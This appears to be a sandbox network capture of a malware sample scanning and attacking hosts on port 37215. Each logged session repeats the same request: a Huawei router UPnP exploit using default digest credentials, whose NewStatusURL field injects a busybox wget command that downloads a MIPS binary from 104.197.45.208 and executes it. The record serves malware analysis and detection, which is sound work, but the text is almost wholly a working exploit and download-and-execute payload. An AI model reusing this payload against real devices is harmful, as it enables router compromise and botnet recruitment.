                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25192.168.2.144809441.172.240.15337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661154985 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192.168.2.145252641.174.190.3937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661180019 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27192.168.2.144626441.38.84.3637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661205053 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28192.168.2.1448308197.82.207.2937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661226988 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192.168.2.1452628156.188.227.6737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661258936 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            30192.168.2.144215041.146.247.11137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661329031 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            31192.168.2.1459112197.12.163.2437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661364079 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            32192.168.2.1460186156.36.89.3937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661416054 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            33192.168.2.143598841.216.220.24237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661427021 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            34192.168.2.145092041.156.92.12037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661477089 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
